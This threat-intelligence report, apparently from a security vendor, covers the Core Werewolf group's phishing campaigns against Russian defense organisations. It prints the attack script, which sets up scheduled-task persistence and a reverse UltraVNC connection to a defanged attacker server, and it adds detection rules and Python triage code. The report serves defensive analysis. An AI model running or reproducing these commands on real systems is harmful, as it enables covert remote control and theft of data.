Core Werewolf targets the defense industry and critical infrastructure
Like many other threat actors, Core Werewolf relies on legitimate tools to achieve its goals. After gaining an initial foothold through phishing emails, the group obtains remote access with UltraVNC, a legitimate remote-desktop program, without deploying any malware.
In this article, we will explore the life cycle of the detected Core Werewolf attacks, look into the tactics, techniques, and procedures employed to compromise the target systems, and describe the group’s infrastructure.
The file used in the first attack that we uncovered was uploaded to VirusTotal on August 6, 2021. Notably, the malicious files were always disguised as Microsoft Word or PDF documents, even though they were in fact executables, namely self-extracting archives with a double extension, for example,
Прил._7_критерии_оценки_...ГУВП.docx.exe (Appendix 7. Assessment criteria). Because the archive also dropped and opened a genuine decoy document, its content did not raise any suspicion with the user, while opening the file silently installed UltraVNC in the background. This gave the attackers complete control over the compromised devices.
The file discovered first contained an order of a defense organization (fig. 1).
The file detected next was posted on December 16, 2021. The phishing document included an internal order by one of the largest joint-stock companies in Russia (fig. 2).
Some time passed before another attack followed. The file was spotted on April 12, 2022 and contained a resume (fig. 3).
The file from the next attack was uploaded on April 18, 2022 and targeted the employees of some defense organizations (fig. 4).
Another file was posted on April 27, 2022 and was dedicated to the military discharge (fig. 5).
In the next attack, with the respective file uploaded on May 8, 2022, the criminals again attached an order of a defense organization (fig. 6).
On May 12, 2022, a new file was published on VirusTotal. This time, the attackers sent methodological recommendations of another defense organization (fig. 7).
The file uploaded on May 27, 2022 again contained an order (fig. 8).
The summer attacks started with a file posted on June 13, 2022. Disguised as a decree of the Government of the Russian Federation, the document amended the state regulation of prices for products supplied under the state defense order (fig. 9).
The next attack, with the file uploaded on June 28, 2022, used a set of guidelines as the lure (fig. 10).
July was marked by an attack that leveraged a document issued by the Department of the Federal Service for Technical and Export Control (FSTEK) of Russia for the Northwestern Federal District. It described the measures to reinforce the protection of information infrastructure facilities in Russia.
The file published on VirusTotal on July 20, 2022 contained another administrative document related to the defense sector.
The file uploaded on July 27, 2022 came as a resume, yet of a different person (fig. 11).
In August, the criminals once again used an order as a phishing document (fig. 12).
In September, the attackers went even further and, instead of some regular order, attached a document marked “For official use only.”
The October attack featured yet another decree of the Government of the Russian Federation. The document introduced amendments to the national program on the development of the nuclear power industry (fig. 13).
The first attack in November (the malicious file was uploaded on November 2) used a cooling supply diagram for a special-purpose high-performance computing complex.
On the following day, a new file was posted, this time containing a set of diagrams.
The next attack in November employed the group's favorite type of lure, a document related to defense industry operations (fig. 14).
The December attack was once again focused on the defense sector employees (fig. 15).
The first attack in 2023 used a request form as a phishing document (fig. 16).
The next attack also took place in January. The phishing document contained methodological recommendations on deferral from call-up for Russian citizens who are in the military reserve and work for certain organizations, for the period of mobilization and wartime (fig. 17).
In February 2023, the attackers got back to sending resumes as phishing documents (fig. 18).
In March 2023, Core Werewolf once again attached a copy of a document meant for official use only.
On March 20, 2023, one more file was uploaded to VirusTotal with the phishing document targeting defense industry personnel.
April 2023 saw the group’s repeated attempt to use a resume for phishing purposes (fig. 19).
The attack that occurred in May featured yet another order (fig. 20).
In each campaign, the devices were compromised in the same way, so the adversary tactics, techniques, and procedures described below apply to all of the attacks. Let us look into the compromise process using the attack recorded in May as an example.
After the victim opens the file НУВП награждение полный.doc.exe (a list of award nominees), the self-extracting archive unpacks into a temporary directory and runs a script that performs the following actions:
- Delayed expansion of environment variables is enabled.
- Environment variables are set, to be used later for command obfuscation.
- A task is created in the Windows Task Scheduler for the daily termination of the UltraVNC process:
  schtasks /create /f /tn "OneDrive Purge Task-S-1-5-21-3177791385" /tr "taskkill /f /im Virtual.exe /sc daily /st 09:02
- A 2-second pause:
  timeout /t 2
- The decoy document is copied from the unpacked archive to disk, one directory above the extraction directory:
  copy /y "%CD%\go67x37i77J07R07W37O07G77J37T67z77l07H67z87w77M9.VH64z44L84J44O04O24a44d54X64C64q74c44R94y54y74R4" "%CD%\..\nuvp.doc"
- A 4-second pause:
  timeout /t 4
- The copied decoy document is opened for the victim:
  start "" "%CD%\..\nuvp.doc"
- The UltraVNC executable is copied from the unpacked archive to disk under the name Virtual.exe:
  copy /y "su22Q42Y62S62R72m92H32I82n02z12w72T72M82T82a92q9.HH75f05T55A55m95l65z65l05u15d05y85o15n45E95i25L3" "Virtual.exe"
- A task is created in the Windows Task Scheduler for the daily execution of the file:
  schtasks /create /f /tn "OneDrive Init Task-I-2-5-22-8712003127" /tr "%HOMEDRIVE%%HOMEPATH%\AppData\Local\Temp\7ZipSfx.000\Virtual.exe" /sc daily /st 09:03
- Any running Virtual.exe process is terminated:
  taskkill /f /im Virtual.exe
- The UltraVNC configuration file is copied to disk:
  copy /y "UltraVNC.ini" "UltraVNC.ini"
- The executable is started:
  start "" "Virtual.exe"
- A task is created in the Windows Task Scheduler to start UltraVNC daily with the attacker's server specified:
  schtasks /create /f /tn "OneDrive Update Task-U-3-5-23-6820155392" /tr "%HOMEDRIVE%%HOMEPATH%\AppData\Local\Temp\7ZipSfx.000\Virtual.exe -autoreconnect -id:%COMPUTERNAME%_%RANDOM% -connect infovesty[.]ru:443" /sc daily /st 09:04
- UltraVNC is started with the same arguments:
  start "" "%CD%\Virtual.exe" -autoreconnect -id:%COMPUTERNAME%_%RANDOM% -connect infovesty[.]ru:443
This way the attackers not only gain access to the compromised system as soon as the victim opens the malicious file, but also establish persistence through the scheduled tasks. The -connect argument makes the UltraVNC server initiate an outbound (reverse) connection to the attacker-controlled host on port 443, and -autoreconnect keeps retrying it, so no inbound port has to be exposed on the victim's side and the traffic goes out over a port that is almost always allowed. Legitimate software thus gives the adversaries complete control over the compromised device: in particular, they can copy and exfiltrate files and monitor the user's actions.
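The persistence left behind by this chain can be triaged on a host from a scheduled-task export. The following Python script is an added example (not BI.ZONE's tooling and not code from the campaign) that reads the output of `schtasks /query /fo CSV /v` and flags tasks matching the artifacts above: a scheduled taskkill, UltraVNC reverse-connection arguments, an action that runs from the 7-Zip SFX staging directory, and an OneDrive-style task name whose SID-like suffix does not start with S-1- as a genuine SID does. The export below is constructed to mirror the three tasks quoted above plus two benign tasks; only the TaskName and Task To Run columns are used.

```python
import csv
import io
import re

# Columns of `schtasks /query /fo CSV /v` used here (sample export constructed below).
NAME_COL = "TaskName"
ACTION_COL = "Task To Run"

# Windows SIDs always begin with S-1-. The campaign's task names copy the
# "OneDrive ... Task-<SID>" convention but with made-up prefixes (I-2-5-.., U-3-5-..).
SID_SUFFIX = re.compile(r"-([A-Z])-\d+-\d+-\d+-\d+$")


def classify(task_name: str, action: str) -> list[str]:
    """Return the reasons a scheduled task matches the persistence pattern (empty if none)."""
    reasons = []
    act = action.lower()
    if "taskkill" in act and " /im " in act:
        reasons.append("scheduled taskkill")
    if " -connect " in act or " -autoreconnect " in act:
        reasons.append("vnc reverse-connect arguments")
    if "\\appdata\\local\\temp\\7zipsfx" in act:
        reasons.append("runs from 7-Zip SFX staging dir")
    m = SID_SUFFIX.search(task_name)
    if m and m.group(1) != "S" and "onedrive" in task_name.lower():
        reasons.append("OneDrive-style name with bogus SID prefix")
    return reasons


def triage(export_csv: str) -> dict[str, list[str]]:
    """Map each suspicious TaskName in a schtasks CSV export to the reasons it was flagged."""
    findings = {}
    for row in csv.DictReader(io.StringIO(export_csv)):
        reasons = classify(row.get(NAME_COL, ""), row.get(ACTION_COL, ""))
        if reasons:
            findings[row[NAME_COL]] = reasons
    return findings


# Constructed export: three tasks modelled on the chain described above plus two benign ones.
SAMPLE_EXPORT = "\r\n".join([
    '"HostName","TaskName","Next Run Time","Status","Author","Task To Run"',
    r'"WS01","\OneDrive Purge Task-S-1-5-21-3177791385","N/A","Ready","WS01\alice","taskkill /f /im Virtual.exe"',
    r'"WS01","\OneDrive Init Task-I-2-5-22-8712003127","N/A","Ready","WS01\alice","C:\Users\alice\AppData\Local\Temp\7ZipSfx.000\Virtual.exe"',
    r'"WS01","\OneDrive Update Task-U-3-5-23-6820155392","N/A","Ready","WS01\alice","C:\Users\alice\AppData\Local\Temp\7ZipSfx.000\Virtual.exe -autoreconnect -id:WS01_1234 -connect infovesty[.]ru:443"',
    r'"WS01","\OneDrive Standalone Update Task-S-1-5-21-1111111111-2222222222-3333333333-1001","N/A","Ready","WS01\alice","C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe"',
    r'"WS01","\MicrosoftEdgeUpdateTaskMachineCore","N/A","Ready","SYSTEM","C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe /c"',
])

if __name__ == "__main__":
    for name, reasons in triage(SAMPLE_EXPORT).items():
        print(f"{name}: {', '.join(reasons)}")
```

Run against a real export with `triage(open("tasks.csv", encoding="utf-8-sig").read())`; the name heuristic is the weakest of the four and is only reported alongside the task name so an analyst can judge it, whereas a scheduled taskkill or a -connect argument in a task action is worth a closer look on its own.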
The attackers sought to register the domain names with several registrars, rather than one. They resorted to the services of Russian and foreign registrars, namely:
- Ukrainian Internet Names Center
- Soaring Eagle Domains
- Realtime Register
- Wild West Domains
The adversaries used Russian names to register the domain names, for example, Aleksandr Vladimirovich Petrishev, as well as email addresses hosted by popular Russian services—mail.ru and yandex.ru. They also used mobile telephone numbers provided by online services that enabled them to receive text messages (fig. 21).
It should be noted that the attackers tended to rent servers located in Russia, which helped them avoid early blacklisting and detection.
The Russian-Ukrainian crisis has significantly affected the global threat landscape and demonstrated the importance of complementing preventive defenses with proactive threat detection. Adversaries keep inventing new evasion methods and increasingly abandon malware in favor of legitimate tools, including those built into the operating system. Such methods have once again proved effective in human-operated attacks conducted by APT groups.
Despite the attackers’ using legitimate programs, it is still possible to identify malicious activity in the course of compromise and neutralize the attack in early stages.
The intruders make ample use of the Windows Task Scheduler, including for the daily termination of the UltraVNC process with taskkill. Note that cmd.exe is the parent process of the schtasks invocation that creates the task. Since this combination of actions is far from typical, it can be used for detection. The key elements of the rule are the following (the command line must contain both substrings):
title: Taskkill Abuse via Task Scheduler
description: Detects taskkill abuse via Task Scheduler as seen in Core Werewolf campaigns
- ' /f'
- ' /im '
Likewise, the Task Scheduler is used to start UltraVNC daily, and the attackers pass specific arguments in the task action. These arguments can be detected with a rule built on the following elements:
title: Scheduled Task for Malicious UltraVNC
description: Detects scheduled task creation for UltraVNC as seen in Core Werewolf campaigns
- 'autoreconnect '
- 'connect '
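To show how the two rules above behave on real-looking telemetry, here is an added Python implementation (not BI.ZONE's rule engine and not their published rules) that evaluates both over process-creation events carrying the Sysmon Event ID 1 fields Image, ParentImage and CommandLine. The events are constructed: the three schtasks invocations from the chain above, a taskkill run directly by the user from cmd.exe, and a benign task creation in the OneDrive naming convention, so that both the true positives and the expected non-hits are visible.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation event (Sysmon Event ID 1 / Security 4688 fields)."""
    image: str
    parent_image: str
    command_line: str


def _is_schtasks_create(ev: ProcEvent) -> bool:
    return ev.image.lower().endswith("\\schtasks.exe") and "/create" in ev.command_line.lower()


def taskkill_via_task_scheduler(ev: ProcEvent) -> bool:
    """Rule 1: cmd.exe spawns schtasks to register a task whose action is 'taskkill /f /im ...'."""
    cl = ev.command_line.lower()
    return (
        _is_schtasks_create(ev)
        and ev.parent_image.lower().endswith("\\cmd.exe")
        and "taskkill" in cl
        and " /f" in cl
        and " /im " in cl
    )


def scheduled_ultravnc(ev: ProcEvent) -> bool:
    """Rule 2: a scheduled task whose action carries UltraVNC reverse-connection arguments."""
    cl = ev.command_line.lower()
    return _is_schtasks_create(ev) and "-autoreconnect " in cl and "-connect " in cl


RULES = {
    "Taskkill Abuse via Task Scheduler": taskkill_via_task_scheduler,
    "Scheduled Task for Malicious UltraVNC": scheduled_ultravnc,
}


def evaluate(events: list[ProcEvent]) -> list[tuple[int, list[str]]]:
    """Return (event index, names of the rules that fired) for every event that matched a rule."""
    hits = []
    for i, ev in enumerate(events):
        fired = [name for name, rule in RULES.items() if rule(ev)]
        if fired:
            hits.append((i, fired))
    return hits


CMD = r"C:\Windows\System32\cmd.exe"
SCHTASKS = r"C:\Windows\System32\schtasks.exe"
SFX_DIR = r"C:\Users\alice\AppData\Local\Temp\7ZipSfx.000"

# Constructed events modelled on the command lines quoted above (indices 0-4).
SAMPLE_EVENTS = [
    ProcEvent(SCHTASKS, CMD,
              'schtasks /create /f /tn "OneDrive Purge Task-S-1-5-21-3177791385" '
              '/tr "taskkill /f /im Virtual.exe" /sc daily /st 09:02'),
    ProcEvent(SCHTASKS, CMD,
              'schtasks /create /f /tn "OneDrive Init Task-I-2-5-22-8712003127" '
              f'/tr "{SFX_DIR}\\Virtual.exe" /sc daily /st 09:03'),
    ProcEvent(SCHTASKS, CMD,
              'schtasks /create /f /tn "OneDrive Update Task-U-3-5-23-6820155392" '
              f'/tr "{SFX_DIR}\\Virtual.exe -autoreconnect -id:WS01_1234 '
              '-connect infovesty[.]ru:443" /sc daily /st 09:04'),
    # taskkill run directly by the user, not registered as a task: must not fire
    ProcEvent(r"C:\Windows\System32\taskkill.exe", CMD, "taskkill /f /im notepad.exe"),
    # benign task creation in the OneDrive naming convention (constructed): must not fire
    ProcEvent(SCHTASKS, r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDriveSetup.exe",
              'schtasks /create /tn "OneDrive Standalone Update Task-S-1-5-21-1111111111-2222222222-3333333333-1001" '
              r'/tr "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe" /sc daily /st 10:00'),
]

if __name__ == "__main__":
    for idx, fired in evaluate(SAMPLE_EVENTS):
        print(idx, fired)
```

Note that the second task of the chain (event 1, the plain daily execution of Virtual.exe) is caught by neither rule: it contains no taskkill and no VNC arguments. A third rule keyed on a task action under \AppData\Local\Temp\7ZipSfx, or on an OneDrive-style task name whose suffix does not start with S-1-, would cover it; that is our suggestion, not part of the rules quoted above.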
More indicators of compromise are available with BI.ZONE Threat Intelligence.
The number of attacks in which legitimate tools are used against companies is constantly growing. Because no malware is involved, such attacks are often missed by preventive security tools, and threat actors can gain access to the infrastructure unnoticed. To discover intrusions of this type, we recommend that companies implement cyber threat detection, response, and prevention solutions, such as BI.ZONE TDR, as part of their SOC.